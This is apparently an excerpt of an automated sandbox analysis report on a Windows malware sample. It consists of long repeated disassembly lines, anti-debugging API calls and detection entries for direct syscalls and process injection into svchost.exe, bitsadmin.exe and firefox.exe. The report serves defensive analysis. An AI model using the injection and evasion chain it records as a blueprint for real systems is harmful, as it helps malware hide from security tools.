                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302645D mov eax, dword ptr fs:[00000030h]3_2_0302645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305245A mov eax, dword ptr fs:[00000030h]3_2_0305245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030BC460 mov ecx, dword ptr fs:[00000030h]3_2_030BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305A470 mov eax, dword ptr fs:[00000030h]3_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305A470 mov eax, dword ptr fs:[00000030h]3_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305A470 mov eax, dword ptr fs:[00000030h]3_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030EA49A mov eax, dword ptr fs:[00000030h]3_2_030EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030364AB mov eax, dword ptr fs:[00000030h]3_2_030364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030644B0 mov ecx, dword ptr fs:[00000030h]3_2_030644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030BA4B0 mov eax, dword ptr fs:[00000030h]3_2_030BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030304E5 mov ecx, dword ptr fs:[00000030h]3_2_030304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03104B00 mov eax, dword ptr fs:[00000030h]3_2_03104B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AEB1D mov eax, dword ptr fs:[00000030h]3_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AEB1D mov eax, dword ptr fs:[00000030h]3_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AEB1D mov eax, dword ptr fs:[00000030h]3_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AEB1D mov eax, dword ptr fs:[00000030h]3_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AEB1D mov eax, dword ptr fs:[00000030h]3_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AEB1D mov eax, dword ptr fs:[00000030h]3_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AEB1D mov eax, dword ptr fs:[00000030h]3_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AEB1D mov eax, dword ptr fs:[00000030h]3_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AEB1D mov eax, dword ptr fs:[00000030h]3_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305EB20 mov eax, dword ptr fs:[00000030h]3_2_0305EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305EB20 mov eax, dword ptr fs:[00000030h]3_2_0305EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F8B28 mov eax, dword ptr fs:[00000030h]3_2_030F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F8B28 mov eax, dword ptr fs:[00000030h]3_2_030F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E4B4B mov eax, dword ptr fs:[00000030h]3_2_030E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E4B4B mov eax, dword ptr fs:[00000030h]3_2_030E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03102B57 mov eax, dword ptr fs:[00000030h]3_2_03102B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03102B57 mov eax, dword ptr fs:[00000030h]3_2_03102B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03102B57 mov eax, dword ptr fs:[00000030h]3_2_03102B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03102B57 mov eax, dword ptr fs:[00000030h]3_2_03102B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C6B40 mov eax, dword ptr fs:[00000030h]3_2_030C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C6B40 mov eax, dword ptr fs:[00000030h]3_2_030C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FAB40 mov eax, dword ptr fs:[00000030h]3_2_030FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D8B42 mov eax, dword ptr fs:[00000030h]3_2_030D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03028B50 mov eax, dword ptr fs:[00000030h]3_2_03028B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DEB50 mov eax, dword ptr fs:[00000030h]3_2_030DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302CB7E mov eax, dword ptr fs:[00000030h]3_2_0302CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040BBE mov eax, dword ptr fs:[00000030h]3_2_03040BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040BBE mov eax, dword ptr fs:[00000030h]3_2_03040BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E4BB0 mov eax, dword ptr fs:[00000030h]3_2_030E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E4BB0 mov eax, dword ptr fs:[00000030h]3_2_030E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03050BCB mov eax, dword ptr fs:[00000030h]3_2_03050BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03050BCB mov eax, dword ptr fs:[00000030h]3_2_03050BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03050BCB mov eax, dword ptr fs:[00000030h]3_2_03050BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03030BCD mov eax, dword ptr fs:[00000030h]3_2_03030BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03030BCD mov eax, dword ptr fs:[00000030h]3_2_03030BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03030BCD mov eax, dword ptr fs:[00000030h]3_2_03030BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DEBD0 mov eax, dword ptr fs:[00000030h]3_2_030DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03038BF0 mov eax, dword ptr fs:[00000030h]3_2_03038BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03038BF0 mov eax, dword ptr fs:[00000030h]3_2_03038BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03038BF0 mov eax, dword ptr fs:[00000030h]3_2_03038BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305EBFC mov eax, dword ptr fs:[00000030h]3_2_0305EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030BCBF0 mov eax, dword ptr fs:[00000030h]3_2_030BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030BCA11 mov eax, dword ptr fs:[00000030h]3_2_030BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306CA24 mov eax, dword ptr fs:[00000030h]3_2_0306CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305EA2E mov eax, dword ptr fs:[00000030h]3_2_0305EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03054A35 mov eax, dword ptr fs:[00000030h]3_2_03054A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03054A35 mov eax, dword ptr fs:[00000030h]3_2_03054A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306CA38 mov eax, dword ptr fs:[00000030h]3_2_0306CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03036A50 mov eax, dword ptr fs:[00000030h]3_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03036A50 mov eax, dword ptr fs:[00000030h]3_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03036A50 mov eax, dword ptr fs:[00000030h]3_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03036A50 mov eax, dword ptr fs:[00000030h]3_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03036A50 mov eax, dword ptr fs:[00000030h]3_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03036A50 mov eax, dword ptr fs:[00000030h]3_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03036A50 mov eax, dword ptr fs:[00000030h]3_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040A5B mov eax, dword ptr fs:[00000030h]3_2_03040A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040A5B mov eax, dword ptr fs:[00000030h]3_2_03040A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306CA6F mov eax, dword ptr fs:[00000030h]3_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306CA6F mov eax, dword ptr fs:[00000030h]3_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306CA6F mov eax, dword ptr fs:[00000030h]3_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DEA60 mov eax, dword ptr fs:[00000030h]3_2_030DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030ACA72 mov eax, dword ptr fs:[00000030h]3_2_030ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030ACA72 mov eax, dword ptr fs:[00000030h]3_2_030ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303EA80 mov eax, dword ptr fs:[00000030h]3_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303EA80 mov eax, dword ptr fs:[00000030h]3_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303EA80 mov eax, dword ptr fs:[00000030h]3_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303EA80 mov eax, dword ptr fs:[00000030h]3_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303EA80 mov eax, dword ptr fs:[00000030h]3_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303EA80 mov eax, dword ptr fs:[00000030h]3_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303EA80 mov eax, dword ptr fs:[00000030h]3_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303EA80 mov eax, dword ptr fs:[00000030h]3_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303EA80 mov eax, dword ptr fs:[00000030h]3_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03104A80 mov eax, dword ptr fs:[00000030h]3_2_03104A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03068A90 mov edx, dword ptr fs:[00000030h]3_2_03068A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03038AA0 mov eax, dword ptr fs:[00000030h]3_2_03038AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03038AA0 mov eax, dword ptr fs:[00000030h]3_2_03038AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03086AA4 mov eax, dword ptr fs:[00000030h]3_2_03086AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03086ACC mov eax, dword ptr fs:[00000030h]3_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03086ACC mov eax, dword ptr fs:[00000030h]3_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03086ACC mov eax, dword ptr fs:[00000030h]3_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03030AD0 mov eax, dword ptr fs:[00000030h]3_2_03030AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03064AD0 mov eax, dword ptr fs:[00000030h]3_2_03064AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03064AD0 mov eax, dword ptr fs:[00000030h]3_2_03064AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306AAEE mov eax, dword ptr fs:[00000030h]3_2_0306AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306AAEE mov eax, dword ptr fs:[00000030h]3_2_0306AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AE908 mov eax, dword ptr fs:[00000030h]3_2_030AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AE908 mov eax, dword ptr fs:[00000030h]3_2_030AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030BC912 mov eax, dword ptr fs:[00000030h]3_2_030BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03028918 mov eax, dword ptr fs:[00000030h]3_2_03028918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03028918 mov eax, dword ptr fs:[00000030h]3_2_03028918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B892A mov eax, dword ptr fs:[00000030h]3_2_030B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C892B mov eax, dword ptr fs:[00000030h]3_2_030C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B0946 mov eax, dword ptr fs:[00000030h]3_2_030B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03104940 mov eax, dword ptr fs:[00000030h]3_2_03104940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03056962 mov eax, dword ptr fs:[00000030h]3_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03056962 mov eax, dword ptr fs:[00000030h]3_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03056962 mov eax, dword ptr fs:[00000030h]3_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0307096E mov eax, dword ptr fs:[00000030h]3_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0307096E mov edx, dword ptr fs:[00000030h]3_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0307096E mov eax, dword ptr fs:[00000030h]3_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D4978 mov eax, dword ptr fs:[00000030h]3_2_030D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D4978 mov eax, dword ptr fs:[00000030h]3_2_030D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030BC97C mov eax, dword ptr fs:[00000030h]3_2_030BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]3_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]3_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]3_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]3_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]3_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]3_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]3_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]3_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]3_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]3_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]3_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]3_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]3_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030309AD mov eax, dword ptr fs:[00000030h]3_2_030309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030309AD mov eax, dword ptr fs:[00000030h]3_2_030309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B89B3 mov esi, dword ptr fs:[00000030h]3_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B89B3 mov eax, dword ptr fs:[00000030h]3_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B89B3 mov eax, dword ptr fs:[00000030h]3_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C69C0 mov eax, dword ptr fs:[00000030h]3_2_030C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A9D0 mov eax, dword ptr fs:[00000030h]3_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A9D0 mov eax, dword ptr fs:[00000030h]3_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A9D0 mov eax, dword ptr fs:[00000030h]3_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A9D0 mov eax, dword ptr fs:[00000030h]3_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A9D0 mov eax, dword ptr fs:[00000030h]3_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A9D0 mov eax, dword ptr fs:[00000030h]3_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030649D0 mov eax, dword ptr fs:[00000030h]3_2_030649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FA9D3 mov eax, dword ptr fs:[00000030h]3_2_030FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030BE9E0 mov eax, dword ptr fs:[00000030h]3_2_030BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030629F9 mov eax, dword ptr fs:[00000030h]3_2_030629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030629F9 mov eax, dword ptr fs:[00000030h]3_2_030629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030BC810 mov eax, dword ptr fs:[00000030h]3_2_030BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03052835 mov eax, dword ptr fs:[00000030h]3_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03052835 mov eax, dword ptr fs:[00000030h]3_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03052835 mov eax, dword ptr fs:[00000030h]3_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03052835 mov ecx, dword ptr fs:[00000030h]3_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03052835 mov eax, dword ptr fs:[00000030h]3_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03052835 mov eax, dword ptr fs:[00000030h]3_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306A830 mov eax, dword ptr fs:[00000030h]3_2_0306A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D483A mov eax, dword ptr fs:[00000030h]3_2_030D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D483A mov eax, dword ptr fs:[00000030h]3_2_030D483A
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_004580A9
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A155
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0042A124 SetUnhandledExceptionFilter,0_2_0042A124
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B91361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B91361
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B94C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B94C7B

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtOpenKeyEx: Direct from: 0x77383C9CJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtQueryValueKey: Direct from: 0x77382BECJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeNtTerminateThread: Direct from: 0x77377B2EJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\bitsadmin.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeThread register set: target process: 5440Jump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2F9008Jump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004587B1 LogonUserW,0_2_004587B1
